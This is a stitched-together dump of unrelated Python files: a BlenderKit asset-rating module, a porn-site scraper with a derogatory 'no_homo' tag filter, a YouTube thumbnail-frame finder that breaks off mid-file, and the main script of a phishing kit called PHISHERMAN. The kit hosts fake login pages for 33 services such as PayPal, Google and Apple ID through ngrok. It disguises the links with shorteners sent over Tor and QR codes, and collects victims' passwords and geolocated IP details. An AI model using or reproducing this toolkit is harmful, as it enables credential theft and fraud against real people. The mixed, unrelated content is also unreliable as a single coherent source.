tasks_queue.add_task((send_rating_to_thread_work_hours, (url, ratings, headers)), wait=2.5, only_last=True)
def upload_rating(asset):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
bkit_ratings = asset.bkit_ratings
# print('rating asset', asset_data['name'], asset_data['assetBaseId'])
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/rating/'
ratings = [
]
if bkit_ratings.rating_quality > 0.1:
ratings = (('quality', bkit_ratings.rating_quality),)
tasks_queue.add_task((send_rating_to_thread_quality, (url, ratings, headers)), wait=2.5, only_last=True)
if bkit_ratings.rating_work_hours > 0.1:
ratings=(('working_hours', round(bkit_ratings.rating_work_hours, 1)),)
tasks_queue.add_task((send_rating_to_thread_work_hours, (url, ratings, headers)), wait=2.5, only_last=True)
thread = threading.Thread(target=upload_rating_thread, args=(url, ratings, headers))
thread.start()
url = paths.get_api_url() + 'assets/' + asset['asset_data']['id'] + '/review'
reviews = {
'reviewText': bkit_ratings.rating_compliments,
'reviewTextProblems': bkit_ratings.rating_problems,
}
if not (bkit_ratings.rating_compliments == '' and bkit_ratings.rating_compliments == ''):
thread = threading.Thread(target=upload_review_thread, args=(url, reviews, headers))
thread.start()
# the info that the user rated an item is stored in the scene
s = bpy.context.scene
s['assets rated'] = s.get('assets rated', {})
if bkit_ratings.rating_quality > 0.1 and bkit_ratings.rating_work_hours > 0.1:
s['assets rated'][asset['asset_data']['assetBaseId']] = True
def get_assets_for_rating():
'''
gets assets from scene that could/should be rated by the user.
TODO this is only a draft.
'''
assets = []
for ob in bpy.context.scene.objects:
if ob.get('asset_data'):
assets.append(ob)
for m in bpy.data.materials:
if m.get('asset_data'):
assets.append(m)
for b in bpy.data.brushes:
if b.get('asset_data'):
assets.append(b)
return assets
asset_types = (
('MODEL', 'Model', 'set of objects'),
('SCENE', 'Scene', 'scene'),
('MATERIAL', 'Material', 'any .blend Material'),
('TEXTURE', 'Texture', 'a texture, or texture set'),
('BRUSH', 'Brush', 'brush, can be any type of blender brush'),
('ADDON', 'Addon', 'addnon'),
)
# TODO drop this operator, not needed anymore.
class UploadRatingOperator(bpy.types.Operator):
"""Upload rating to the web db"""
bl_idname = "object.blenderkit_rating_upload"
bl_label = "Send Rating"
bl_options = {'REGISTER', 'UNDO', 'INTERNAL'}
# type of upload - model, material, textures, e.t.c.
# asset_type: EnumProperty(
# name="Type",
# items=asset_types,
# description="Type of asset",
# default="MODEL",
# )
# @classmethod
# def poll(cls, context):
# return bpy.context.active_object != None and bpy.context.active_object.get('asset_id') is not None
def draw(self, context):
layout = self.layout
layout.label(text='Rating sent to server. Thanks for rating!')
def execute(self, context):
return {'FINISHED'}
def invoke(self, context, event):
wm = context.window_manager
asset = utils.get_active_asset()
upload_rating(asset)
return wm.invoke_props_dialog(self)
def stars_enum_callback(self, context):
'''regenerates the enum property used to display rating stars, so that there are filled/empty stars correctly.'''
items = []
for a in range(0, 10):
if self.rating_quality < a + 1:
icon = 'SOLO_OFF'
else:
icon = 'SOLO_ON'
# has to have something before the number in the value, otherwise fails on registration.
items.append((f'{a + 1}', f'{a + 1}', '', icon, a + 1))
return items
def update_quality_ui(self, context):
'''Converts the _ui the enum into actual quality number.'''
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
if user_preferences.api_key == '':
# ui_panels.draw_not_logged_in(self, message='Please login/signup to rate assets.')
# bpy.ops.wm.call_menu(name='OBJECT_MT_blenderkit_login_menu')
# return
bpy.ops.wm.blenderkit_login('INVOKE_DEFAULT',
message='Please login/signup to rate assets. Clicking OK takes you to web login.')
self.rating_quality_ui = '0'
self.rating_quality = int(self.rating_quality_ui)
def update_ratings_work_hours_ui(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
if user_preferences.api_key == '':
# ui_panels.draw_not_logged_in(self, message='Please login/signup to rate assets.')
# bpy.ops.wm.call_menu(name='OBJECT_MT_blenderkit_login_menu')
# return
bpy.ops.wm.blenderkit_login('INVOKE_DEFAULT',
message='Please login/signup to rate assets. Clicking OK takes you to web login.')
self.rating_work_hours_ui = '0'
self.rating_work_hours = float(self.rating_work_hours_ui)
def update_ratings_work_hours_ui_1_5(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
if user_preferences.api_key == '':
# ui_panels.draw_not_logged_in(self, message='Please login/signup to rate assets.')
# bpy.ops.wm.call_menu(name='OBJECT_MT_blenderkit_login_menu')
# return
bpy.ops.wm.blenderkit_login('INVOKE_DEFAULT',
message='Please login/signup to rate assets. Clicking OK takes you to web login.')
self.rating_work_hours_ui_1_5 = '0'
# print('updating 1-5')
# print(float(self.rating_work_hours_ui_1_5))
self.rating_work_hours = float(self.rating_work_hours_ui_1_5)
class FastRateMenu(Operator):
"""Fast rating of the assets directly in the asset bar - without need to download assets."""
bl_idname = "wm.blenderkit_menu_rating_upload"
bl_label = "Send Rating"
bl_options = {'REGISTER', 'UNDO', 'INTERNAL'}
message: StringProperty(
name="message",
description="message",
default="Rating asset")
asset_id: StringProperty(
name="Asset Base Id",
description="Unique name of the asset (hidden)",
default="")
asset_type: StringProperty(
name="Asset type",
description="asset type",
default="")
rating_quality: IntProperty(name="Quality",
description="quality of the material",
default=0,
min=-1, max=10,
update=update_ratings_quality)
# the following enum is only to ease interaction - enums support 'drag over' and enable to draw the stars easily.
rating_quality_ui: EnumProperty(name='rating_quality_ui',
items=stars_enum_callback,
description='Rating stars 0 - 10',
default=0,
update=update_quality_ui,
)
rating_work_hours: FloatProperty(name="Work Hours",
description="How many hours did this work take?",
default=0.00,
min=0.0, max=1000, update=update_ratings_work_hours
)
rating_work_hours_ui: EnumProperty(name="Work Hours",
description="How many hours did this work take?",
items=[('0', '0', ''),
('.5', '0.5', ''),
('1', '1', ''),
('2', '2', ''),
('3', '3', ''),
('4', '4', ''),
('5', '5', ''),
('6', '6', ''),
('8', '8', ''),
('10', '10', ''),
('15', '15', ''),
('20', '20', ''),
('50', '50', ''),
('100', '100', ''),
('150', '150', ''),
('200', '200', ''),
('250', '250', ''),
],
default='0', update=update_ratings_work_hours_ui
)
rating_work_hours_ui_1_5: EnumProperty(name="Work Hours",
description="How many hours did this work take?",
items=[('0', '0', ''),
('.2', '0.2', ''),
('.5', '0.5', ''),
('1', '1', ''),
('2', '2', ''),
('3', '3', ''),
('4', '4', ''),
('5', '5', '')
],
default='0', update=update_ratings_work_hours_ui_1_5
)
@classmethod
def poll(cls, context):
scene = bpy.context.scene
ui_props = scene.blenderkitUI
return ui_props.active_index > -1
def draw(self, context):
layout = self.layout
col = layout.column()
# layout.template_icon_view(bkit_ratings, property, show_labels=False, scale=6.0, scale_popup=5.0)
col.label(text=self.message)
row = col.row()
row.prop(self, 'rating_quality_ui', expand=True, icon_only=True, emboss=False)
col.separator()
col.prop(self, 'rating_work_hours')
row = col.row()
if self.asset_type == 'model':
row.prop(self, 'rating_work_hours_ui', expand=True, icon_only=False, emboss=True)
else:
row.prop(self, 'rating_work_hours_ui_1_5', expand=True, icon_only=False, emboss=True)
def execute(self, context):
user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
api_key = user_preferences.api_key
headers = utils.get_headers(api_key)
url = paths.get_api_url() + f'assets/{self.asset_id}/rating/'
rtgs = [
]
if self.rating_quality_ui == '':
self.rating_quality = 0
else:
self.rating_quality = int(self.rating_quality_ui)
if self.rating_quality > 0.1:
rtgs = (('quality', self.rating_quality),)
tasks_queue.add_task((send_rating_to_thread_quality, (url, rtgs, headers)), wait=2.5, only_last=True)
if self.rating_work_hours > 0.1:
rtgs = (('working_hours', round(self.rating_work_hours, 1)),)
tasks_queue.add_task((send_rating_to_thread_work_hours, (url, rtgs, headers)), wait=2.5, only_last=True)
return {'FINISHED'}
def invoke(self, context, event):
scene = bpy.context.scene
ui_props = scene.blenderkitUI
if ui_props.active_index > -1:
sr = bpy.context.scene['search results']
asset_data = dict(sr[ui_props.active_index])
self.asset_id = asset_data['id']
self.asset_type = asset_data['assetType']
self.message = f"Rate asset {asset_data['name']}"
wm = context.window_manager
return wm.invoke_props_dialog(self)
def rating_menu_draw(self, context):
layout = self.layout
ui_props = context.scene.blenderkitUI
sr = bpy.context.scene['search results orig']
asset_search_index = ui_props.active_index
if asset_search_index > -1:
asset_data = dict(sr['results'][asset_search_index])
col = layout.column()
layout.label(text='Admin rating Tools:')
col.operator_context = 'INVOKE_DEFAULT'
op = col.operator('wm.blenderkit_menu_rating_upload', text='Fast rate')
op.asset_id = asset_data['id']
op.asset_type = asset_data['assetType']
def register_ratings():
bpy.utils.register_class(UploadRatingOperator)
bpy.utils.register_class(FastRateMenu)
# bpy.types.OBJECT_MT_blenderkit_asset_menu.append(rating_menu_draw)
def unregister_ratings():
pass;
# bpy.utils.unregister_class(StarRatingOperator)
bpy.utils.unregister_class(UploadRatingOperator)
bpy.utils.unregister_class(FastRateMenu)
|
main.py
|
#!/Library/Frameworks/Python.framework/Versions/3.8/bin/python3
import subprocess
from sys import exit
from typing import final
from src.termcolor import colored
import platform
from base64 import b64decode
from zipfile import ZipFile
from os import walk,path,getcwd,mkdir,remove,environ
import threading
from datetime import datetime
from src import requests
from src.torpy.http.requests import TorRequests
from src.flask import Flask, render_template, request
import logging
log = logging.getLogger('werkzeug')
log.disabled = True
environ['WERKZEUG_RUN_MAIN'] = 'true'
try:
subprocess.check_output('php -v > /dev/null 2>&1',shell=True)
except:
print(colored('[*] PLEASE INSTALL PHP BEFORE STARTING PHISHERMAN','red',attrs=['bold']))
exit()
def get_my_ip():
return requests.get('https://api.ipify.org/?format=json').content.decode('utf8').split(':')[-1][1:-2]
def shorten(url,vpn):
inter = vpn.post('http://lnkiy.com/createShortLink',data={"link":""+url}).content.decode('utf8')
if '++' in inter:
return inter.split('++')[0]
else:
print(inter)
return '[*] Error generating random shortened URL'
def custom_short(url,c,vpn):
inter = vpn.post('http://lnkiy.com/createCustomUrl',data={"linld":""+url,"slink":""+c}).content.decode('utf8')
if '++' in inter:
return inter.split('++')[0]
else:
return '[*] Error generating custom shortened URL'
def qrcode(url,server,vpn):
if not path.isdir('qrcodes'):
mkdir('qrcodes')
if 'lnkiy' in url:
c = vpn.get(url+'-qrcode',allow_redirects = True).content.decode('utf8').split('<img height="300px" width="300px" src="')[-1].split('"/>')[0]
open('qrcodes/'+server+'-qr.png','wb').write(b64decode(c.split(',')[-1]))
return 'qrcodes/'+server+'-qr.png'
else:
open('qrcodes/'+server+'-qr.png','wb').write(requests.get('https://chart.apis.google.com/chart?cht=qr&chs=300x300&chl='+url+'&chld=H|0').content)
return 'qrcodes/'+server+'-qr.png'
def ngrok():
try:
subprocess.check_output('./ngrok -v > /dev/null 2>&1',shell=True)
return
except:
pass
if (1):
print(colored('[*] Downloading ngrok','red',attrs=['bold']))
if platform.system() == 'Darwin':
r = requests.get('https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-darwin-amd64.zip',allow_redirects=True).content
open('ngrok-zip.zip','wb').write(r)
else:
r = requests.get('https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip',allow_redirects=True).content
open('ngrok-zip.zip','wb').write(r)
with ZipFile('ngrok-zip.zip', 'r') as zip:
zip.extractall()
subprocess.Popen(['chmod','+x', 'ngrok'],stdin =subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)
tkn = input(colored('[*] Please create an account on https://ngrok.com and enter your authtoken : ','green',attrs=['bold']))
subprocess.Popen(['./ngrok','authtoken', tkn],stdin =subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)
subprocess.Popen(['rm','-rf', 'ngrok-zip.zip'],stdin =subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)
get_link = lambda : "https:"+requests.get('http://127.0.0.1:4040/api/tunnels/command_line').content.decode('utf8').split(',')[2].split(':')[2].strip('"')
start_ngrok = lambda : subprocess.Popen(['./ngrok','http', '3030'],stdin =subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)
def start_php(server):
subprocess.Popen(['php','-S', '127.0.0.1:3030','-t','sites/'+server],stdin =subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,universal_newlines=True)
def refresh():
for root, dirs, files in walk(getcwd()+'/sites/'):
for file in files:
if file in ('ip.txt','redir.txt','victims.txt'):
open(path.join(root, file),'w+')
for root, dirs, files in walk(getcwd()+'/qrcodes/'):
for file in files:
if file.split('.')[-1].lower() == 'png':
remove('qrcodes/'+file)
def attack(server,url,wifi,custom,qr):
t1 = threading.Thread(target=start_ngrok)
t2 = threading.Thread(target=start_php,args=[server])
t1.setDaemon = True
t2.setDaemon = True
print()
print(colored('[*] Starting php server....','green',attrs=['bold']))
t2.start()
print(colored('[*] Starting ngrok....','green',attrs=['bold']))
t1.start()
if '/' not in server:
open(getcwd()+'/sites/'+server+'/redir.txt','w+').write(url)
elif wifi:
open(getcwd()+'/sites/'+server+'/wifi.txt','w+').write(wifi)
print(colored('[*] Initiating Tor....','green',attrs=['bold']))
my_ip = [get_my_ip().strip(' ').strip('\n')]
with TorRequests() as tor_requests:
with tor_requests.get_session() as sess:
print(colored('[*] Generating links....','green',attrs=['bold']))
while 1:
try:
link = get_link()
qrc = ''
shortened = ''
if custom:
shortened = custom_short(link,custom,sess)
if '://' not in shortened:
shortened += '\n'+shorten(link,sess)
else:
shortened = shorten(link,sess)
if qr:
if '://' in shortened:
ur = shortened if '\n' not in shortened else shortened.split('\n')[-1]
qrc = '[*] QR Code for '+ur+' saved at '+qrcode(ur,server,sess)
else:
qrc = '[*] QR Code for '+link+' saved at '+qrcode(link,server,sess)
break
except Exception as e:
print(e)
return
print()
print(colored('[*] Send any of these links to victim : \n\n','green',attrs=['bold'])+colored(link+'\n'+shortened+'\n'+qrc,'red',attrs=['bold']))
return
def visitors(server):
final = ''
v1 = '''<div class="row"><input type="radio" name="expand"><span class="cell primary" data-label="IP Address">'''
v2 = '''</span><span class="cell" data-label="'''
v3 = '">'
v4 = "</span>"
v5 = "</span></div>"
r = open('sites/'+server+'/ip.txt').read().split('\n')
f = ip_details(r)
if not f:
return ''
for a in f:
k = list(a.keys())
v = list(a.values())
final += v1+v[0]+v2
for b in range(len(v)-1):
final += k[b]+v3+v[b]+v4+v2
final += v5
return final
def victims(server):
final = ''
v1 = '''<div class="row"><input type="radio" name="expand"><span class="cell primary" data-label="Username">'''
v2 = '''</span><span class="cell" data-label="Password">'''
v3 = '</span></div>'
for a in open('sites/'+server+'/victims.txt').read().split('\n'):
if a:
b = a.split('<!:!>')
final += v1+b[0]+v2+b[1]+v3
if not final:
return ''
return final
def ip_details(lisz):
final = []
lisz = lisz[:-1]
for lis in range(len(lisz)):
if lisz[lis][0] not in '0123456789':
continue
finale = {}
ip = lisz[lis]
headers = {
"User-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"
}
url = 'http://ip-api.com/json/'+ip.strip('\n')
dic = requests.get(url,headers=headers).json()
if 'AWS' in dic['org']:
return 0
finale['IP Address']=lisz[lis]
finale['Language']=lisz[lis+1]
finale['User Agent']=lisz[lis+2]
finale['Country']=dic['country']
finale['Country Code']=dic['countryCode']
finale['Region']=dic['regionName']
finale['City']=dic['city']
finale['Zip Code']=dic['zip']
finale['ISP Latitude']=str(dic['lat'])
finale['ISP Longitude']=str(dic['lon'])
finale['Timezone']=dic['timezone']
finale['ISP']=dic['isp']
finale['ISP Organisation']=dic['org']
finale['AS']=dic['as']
final.append(finale)
return final
def main():
ngrok()
s1 = colored('''
[*] DISCLAIMER : DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE [*]
FOR EDUCATIONAL PURPOSES ONLY
''','red',attrs=['bold'])
s2 = colored('''
.
' \ O_____ _ _ _____ _____ _ _ ______ _____ __ __ _ _
' \@ | __ \| | | |_ _|/ ____| | | | ____| __ \| \/ | /\ | \ | |
' `\/| |__) | |__| | | | | (___ | |__| | |__ | |__) | \ / | / \ | \| |
' __| ___/| __ | | | \___ \| __ | __| | _ /| |\/| | / /\ \ | . ` |
' //| | | | | | |_| |_ ____) | | | | |____| | \ \| | | |/ ____ \| |\ |
' // | |_| |_| |_|_____|_____/|_| |_|______|_| \_\_| |_/_/ \_\_| \_| v1.0
'~-~-~-~-~-~"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
''','green',attrs=['bold'])
s3 = colored('''
[1] ADOBE [11] INSTAGRAM [21] TWITCH [31] FLICKR
[2] AMAZON [12] LINKEDIN [22] TWITTER [32] COINIMP
[3] APPLE ID [13] MESSENGER [23] WORDPRESS [33] INSTAGRAM VERIFICATION
[4] WIFI [14] MICROSOFT [24] YAHOO [q/Q] QUIT
[5] DROPBOX [15] NETFLIX [25] EBAY
[6] FACEBOOK [16] PAYPAL [26] ORIGIN
[7] GITHUB [17] PINTEREST [27] CRYPTOCOIN
[8] GOOGLE [18] PROTONMAIL [28] STACKOVERFLOW
[9] iCLOUD [19] SNAPCHAT [29] NGROK
[10] IGFOLLOWERS [20] STEAM [30] REDDIT
''','green',attrs=['bold'])
print(s1+s2+s3,end='\n\n')
server_list={
1 : 'adobe',
2 : 'amazon',
3 : 'apple',
4 : 'wifi',
5 : 'dropbox',
6 : 'facebook',
7 : 'github',
8 : 'google',
9 : 'icloud',
10 : 'igfollowers',
11 : 'instagram',
12 : 'linkedin',
13 : 'messenger',
14 : 'microsoft',
15 : 'netflix',
16 : 'paypal',
17 : 'pinterest',
18 : 'protonmail',
19 : 'snapchat',
20 : 'steam',
21 : 'twitch',
22 : 'twitter',
23 : 'wordpress',
24 : 'yahoo',
25 : 'ebay',
26 : 'origin',
27 : 'cryptocoin',
28 : 'stackoverflow',
29 : 'ngrok',
30 : 'reddit',
31 : 'flickr',
32 : 'coinimp',
33 : 'instagram-verified'
}
links = {
'apple' : 'https://www.apple.com/shop/bag',
'igfollowers' : 'https://www.instafollowerspro.com/login/login-procc.php',
'microsoft' : 'https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=13&ct=1616477099&rver=7.0.6738.0&wp=MBI_SSL&wreply=https:%2F%2Faccount.microsoft.com%2Fauth%2Fcomplete-signin%3Fru%3Dhttps%253A%252F%252Faccount.microsoft.com%252F%253Frefp%253Dsignedout-index%2526refd%253Dwww.google.com&id=292666&lw=1&fl=easi2&uiflavor=web&mkt=EN-GB&lc=2057&contextid=34E1E35DF72CFEA1&bk=1616477114&uaid=d0aa0f5716da4260bfd055b0666a726e&pid=0',
'protonmail' : 'https://mail.protonmail.com/inbox',
'yahoo' : 'https://login.yahoo.com/account/challenge/password?done=https%3A%2F%2Fwww.yahoo.com%2F&sessionIndex=QQ--&acrumb=8JMZJQox&display=login&authMechanism=primary',
'instagram' : 'https://www.instagram.com',
'adobe' : 'https://www.adobe.com/',
'amazon' : 'https://www.amazon.com',
'dropbox' : 'https://www.dropbox.com/',
'facebook' : 'https://www.facebook.com',
'github' : 'https://www.github.com/',
'google' : 'https://www.google.com/webhp?hl=en&sa=X&ved=0ahUKEwiur43wqM7vAhX0wTgGHdiYBf8QPAgI',
'icloud' : 'https://www.icloud.com/',
'linkedin' : 'https://www.linkedin.com/',
'messenger' : 'https://www.messenger.com/',
'netflix' : 'https://www.netflix.com/',
'paypal' : 'https://www.paypal.com/',
'pinterest' : 'https://www.pinterest.com/',
'snapchat' : 'https://www.snapchat.com/',
'steam' : 'https://store.steampowered.com/',
'twitch' : 'https://www.twitch.tv/',
'twitter' : 'https://twitter.com/?lang=en',
'wordpress' : 'https://wordpress.com/me',
'ebay' : 'https://www.ebay.com/',
'origin' : 'https://www.origin.com/en-us/store',
'cryptocoin' : 'https://www.cryptocoin.pro/',
'stackoverflow' : 'https://stackoverflow.com/',
'ngrok' : 'https://ngrok.com/',
'reddit' : 'https://www.reddit.com/',
'flickr' : 'https://www.flickr.com',
'coinimp' : 'https://www.coinimp.com/dashboard',
}
while 1:
print(colored('[*] Select your choice : ','green',attrs=['bold']),end='')
ch = input()
if ch.upper() == 'Q':
return
elif int(ch) in server_list:
server = server_list[int(ch)]
break
else:
print(colored('[*] Invalid choice','yellow',attrs=['bold']))
if server.upper() not in 'WIFI INSTAGRAM-VERIFIED':
r = colored('[*] Enter the URL you want to redirect the victim to (default is homepage of '+server.upper()+') : ','green',attrs=['bold'])
print()
redir_url = input(r)
if not redir_url:
redir_url = links[server]
wifi_model = ''
elif server.upper() == 'WIFI':
sub_servers = {
1 : 'firmware-upgrade',
2 : 'starbucks-login',
3 : 'modal-login'
}
print(colored('''
[1] FIRMWARE UPGRADE
[2] STARBUCKS LOGIN TO GOOGLE
[3] LOGIN TO WIFI THROUGH MODAL
''','green',attrs=['bold']))
wifi_model = redir_url = ''
while 1:
ch_sub = input(colored('[*] Select your choice ','green',attrs=['bold']))
if ch_sub in '123':
server += '/'+sub_servers[int(ch_sub)]
break
else:
print(colored('[*] Invalid choice','yellow',attrs=['bold']))
if ch_sub == '1':
print()
wifi_model = input(colored('[*] Enter the brand of the target router ','green',attrs=['bold'])).upper()
elif ch_sub == '3':
print()
wifi_model1 = input(colored('[*] Enter the AP name of the target router ','green',attrs=['bold']))
wifi_model2 = input(colored('[*] Enter the encryption type of the target router ','green',attrs=['bold']))
wifi_model = wifi_model1.upper()+':'+wifi_model2.upper()
else:
wifi_model = redir_url = ''
print()
custom = input(colored('[*] Enter a custom shortened URL name (leave empty to generate a random shortened URL) ','green',attrs=['bold']))
print()
qr = input(colored('[*] Do you want to generate a QR Code for the link (Y/N)? '))
qr = 1 if qr.upper() == 'Y' else 0
attack(server,redir_url,wifi_model,custom,qr)
final = '''[*] Navigate to http://127.0.0.1:5000 from your browser to view accounts phished\n\n[*] Press ctrl+C to quit'''
print(colored(final,'yellow',attrs=['bold']))
return server
app = Flask(__name__)
class web_server:
global server
refresh()
server = main()
if not server:
exit()
@app.route('/',methods = ['GET'])
def index():
return render_template('index.html')
@app.route('/visitors')
def index2():
return render_template('visitors.html')+visitors(server)
@app.route('/victims')
def index3():
return render_template('victims.html')+victims(server)
if __name__ == '__main__' and platform.system().upper() != 'WINDOWS':
app.run()
|
query.py
|
import requests as req
import bs4
from urllib.parse import quote
import time
import threading
from post import Post
from threads_request import threaded_request
class Query(object):
def __init__(self):
pass
@staticmethod
def query_by_tags(tags: set, pages: int = 1, anti_tags: set = set()):
"""Make a rule 34 Posts query by tags
Args:
tags (set{str}): Requested tags
pages (int, optionnal): Number of pages to browse
anti_tags (set, optionnal) : Tags to exclude from request
Returns:
Union(Post[], None): Found posts
"""
pages_url = list()
posts_id = set()
tags = {quote(tag.replace(' ', '_').lower()) for tag in tags}
anti_tags = {'-'+quote(tag.replace(' ', '_').lower()) for tag in anti_tags}
formatted_args = '+'.join(tags) + '+' + '+'.join(anti_tags)
base_url = f"https://rule34.xxx/index.php?page=post&s=list&tags={formatted_args}"
print(time.time(), 'Getting in all IDS...')
start = time.time()
for page_id in map(lambda x: x*42, range(pages)):
page_url = base_url+f'&pid={page_id}'
pages_url.append(page_url)
def page_handler(page_url):
page_soup = bs4.BeautifulSoup(req.get(page_url).content, features='html.parser')
for thumbnail in page_soup.findAll('span', {'class':'thumb'}):
post_id = thumbnail.a['id'][1:]
if Post.is_id_valid(post_id):
posts_id.add(post_id)
THREADS = []
for url in pages_url:
t = threading.Thread(target=page_handler, args=(url,))
THREADS.append(t)
for thread in THREADS:
thread.start()
for thread in THREADS:
thread.join()
print(time.time(), 'Done getting all IDs')
print('Getting all ids took', time.time()-start, 's')
return threaded_request(posts_id)
@classmethod
def query_by_artist(cls, name: str, **kwargs):
"""Make a rule 34 Posts query by artist name
Args:
name (str): Requested artist
pages (int, optionnal): Number of pages to browse
anti_tags (set, optionnal) : Tags to exclude from request
Returns:
Union(Post[], None): Found posts
"""
return cls.query_by_tags({name,}, **kwargs)
@classmethod
def query_by_characters(cls, names: tuple, **kwargs):
"""Make a rule 34 Posts query by artist name
WARNING : Characters names might follow different schemes :
* name
* name_firstname
* firstname_name
* name_(work)
Args:
name (tuple): Requested characters
pages (int, optionnal): Number of pages to browse
anti_tags (set, optionnal) : Tags to exclude from request
Returns:
Union(Post[], None): Found posts
"""
names = tuple((names,))
return cls.query_by_tags(set(names), **kwargs)
@classmethod
def query_by_work(cls, name: str, **kwargs):
"""Make a rule 34 Posts query by artist name
WARNING : Characters names might follow different schemes :
* name
* name_firstname
* firstname_name
* name_(work)
Args:
name (tuple): Requested work
pages (int, optionnal): Number of pages to browse
anti_tags (set, optionnal) : Tags to exclude from request
Returns:
Union(Post[], None): Found posts
"""
names = tuple((name,))
return cls.query_by_tags(set(names), **kwargs)
@staticmethod
def no_homo():
"""You'll thanks me later."""
return {'yaoi', '1boy', 'male_only', 'gay', 'gay_sex', '2boys', 'femboy', 'genderswap', 'solo_male', 'futanari', 'futa_only', '1futa', 'male_on_futa', 'furry', 'eroborus', 'gachichan'}
|
main.py
|
import os
import os.path as path
import requests
import youtube_dl
import imagehash
from PIL import Image
import ffmpeg
from youtube_dl.utils import DownloadError
import responder
import json
import asyncio
import base64
import threading
import time
dirpath = "/tmp/yfts"
if not path.exists(dirpath):
os.mkdir(dirpath)
if not path.exists(dirpath + "/images/"):
os.mkdir(dirpath + "/images/")
if not path.exists(dirpath + "/thumbnails/"):
os.mkdir(dirpath + "/thumbnails/")
if not path.exists(dirpath + "/videos/"):
os.mkdir(dirpath + "/videos/")
def downloadThumbnail(vid):
url = "https://img.youtube.com/vi/{vid}/maxresdefault.jpg".format(vid=vid)
response = requests.get(url)
print("Status code: {}".format(response.status_code))
if "image" not in response.headers["content-type"]:
print("Content type not supported: {}".format(
response.headers["content-type"]))
return False
with open(dirpath + "/thumbnails/" + vid + ".jpg", "wb") as f:
f.write(response.content)
return True
def downloadVideo(vid):
ydl = youtube_dl.YoutubeDL(
{"outtmpl": dirpath + "/videos/%(id)s.%(ext)s", "format": "webm"})
try:
with ydl:
ydl.extract_info(
"https://youtu.be/{}".format(vid),
download=True
)
except Exception as e:
return e
def convertVideoToImage(vid):
if not path.exists(dirpath + "/images/{}/".format(vid)):
os.mkdir(dirpath + "/images/{}/".format(vid))
try:
stream = ffmpeg.input(
dirpath + "/videos/" + vid + ".webm"
)
stream = ffmpeg.output(
stream,
dirpath +
'/images/{}/%05d.jpg'.format(vid),
r=1
)
ffmpeg.run(stream)
return True
except Exception as e:
return e
def getImageBase64(vid, sec):
print("getImageBase64({}, {})".format(vid, sec))
with open(dirpath + "/images/{}/{}.jpg".format(vid, str(sec).zfill(5)), "rb") as f:
data = f.read()
return base64.b64encode(data).decode("utf-8")
def findThumbnail(vid):
thumbnails_hash = imagehash.phash(
Image.open(dirpath + "/thumbnails/" + vid + ".jpg")
)
files = [f for f in os.listdir(
dirpath + "/images/{}/".format(vid)) if path.isfile(path.join(dirpath + "/images/{}/".format(vid), f))]
files_similar = {}
for file in files:
file_hash = imagehash.phash(Image.open(
path.join(dirpath + "/images/{}/".format(vid), file)))
files_similar[int(file[:-4])] = file_hash-thumbnails_hash
return sorted(files_similar.items(), key=lambda x: x[1])
def getInfomation(url):
try:
with youtube_dl.YoutubeDL({}) as ydl:
info = ydl.extract_info(url, download=False)
return info
except Exception as e:
return e
def main(url):
info = getInfomation(url)
title = info.get("title", None)
uploader = info.get("uploader", None)
vid = info.get("id", None)
if vid is None:
print("Could not find video ID")
return
print(title + " - " + uploader)
if not path.exists(dirpath + "/images/"):
os.mkdir(dirpath + "/images/")
if not path.exists(dirpath + "/thumbnails/"):
os.mkdir(dirpath + "/thumbnails/")
if not path.exists(dirpath + "/videos/"):
os.mkdir(dirpath + "/videos/")
print(downloadThumbnail(vid))
print(downloadVideo(vid))
print(convertVideoToImage(vid))
print(findThumbnail(vid))
api = responder.API()
clients = {}
@api.route("/")
def indexPage(req, response):
response.headers = {"Content-Type": "text/html; charset=utf-8"}
with open(path.dirname(path.abspath(__file__)) + "/index.html") as f:
response.text = f.read()
@api.route("/api", websocket=True)
async def youtubeThumb(ws):
await ws.accept()
key = ws.headers.get("sec-websocket-key")
clients[key] = ws
try:
while True:
print("- Process started.")
# Process 0 : Waiting url
print("[0] Waiting URL...")
await ws.send_json({
"status": True,
"process_code": 0,
"message": "Waiting URL...",
"message_ja": "URLใๅพ
ใฃใฆใใพใ..."
})
url = await ws.receive_text()
# Process 1: Received url, Get video infomation
print("[1] Getting Video Infomation...")
await ws.send_json({
"status": True,
"process_code": 1,
"message": "Getting Video Infomation...",
"message_ja": "ๅ็ปๆ
ๅ ฑใๅๅพใใฆใใพใ..."
})
await asyncio.sleep(1)
info = getInfomation(url)
# Process 2 : Whether got information
if isinstance(info, Exception):
if "not a valid URL" in str(info):
info = "Invalid URL"
print("[2] Get Video Infomation failed.")
await ws.send_json({
"status": False,
"process_code": 2,
"message": "Get Video Infomation failed. <code>{}</code>".format(str(info)),
"message_ja": "ๅ็ปๆ
ๅ ฑใฎๅๅพใซๅคฑๆใใพใใ"
})
await asyncio.sleep(1)
await ws.close()
del clients[key]
return
print("[2] Get Video Infomation completed.")
await ws.send_json({
"status": True,
"process_code": 2,
"message": "Get Video Infomation completed.",
"message_ja": "ๅ็ปๆ
ๅ ฑใฎๅๅพใซๆๅใใพใใใ",
"info": {
"vid": info.get("id"),
"title": info.get("title"),
"uploader": info.get("uploader")
}
})
vid = info.get("id")
await asyncio.sleep(1)
# Process 3 : Download thumbnail image
print("[3] Downloading thumbnail image...")
await ws.send_json({
"status": True,
"process_code": 3,
"message": "Downloading thumbnail image...",
